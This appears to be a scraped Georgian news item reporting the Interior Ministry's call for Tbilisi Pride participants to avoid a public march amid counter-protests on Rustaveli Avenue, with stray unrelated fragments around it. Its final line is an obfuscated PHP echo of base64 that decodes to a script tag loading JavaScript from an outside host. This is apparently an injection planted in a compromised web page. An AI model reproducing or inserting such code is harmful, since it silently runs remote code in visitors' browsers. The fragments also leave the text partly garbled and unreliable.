celsiusi
ავერსი შნაიდერი
შინაგან საქმეთა სამინისტრო „თბილისი პრაიდს“ მოუწოდებს ღია და საჯარო სივრცეში არ გამართონ მარში.
 
უწყება წერს, რომ „თბილისი პრაიდის“ დასკვნითი ღონისძიების ჩატარება მონაწილე პირთათვის უსაფრთხოების რისკების შემცველია.
 
„კიდევ ერთხელ საჯაროდ მოვუწოდებთ “თბილისი პრაიდის” მონაწილეებს, რუსთაველის გამზირზე, მოწინააღმდეგე ჯგუფების მიერ დაგეგმილი აქციების მასშტაბურობიდან გამომდინარე, უარი თქვან ღია, საჯარო სივრცეში მარშის გამართვაზე.
 
შინაგან საქმეთა სამინისტრო მოუწოდებს რუსთაველზე შეკრებილ ყველა პირს, დაიცვან წესრიგი, დაემორჩილონ პოლიციელთა კანონიერ მოთხოვნებს და ნებისმიერ თემაზე პროტესტი გამოხატონ კანონის ფარგლებში. ასევე მოვუწოდებთ აქციის მონაწილეებს არ დაუშვან ძალადობრივი მოწოდებები და არ გასცდნენ შეკრებისა და გამოხატვის კანონით დასაშვებ ფარგლებს.
სამართალდარღვევის ყველა ფაქტს პოლიციის მხრიდან მოჰყვება მკაცრი და მყისიერი რეაგირება,“ – ნათქვამია განცხადებაში.
1044
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");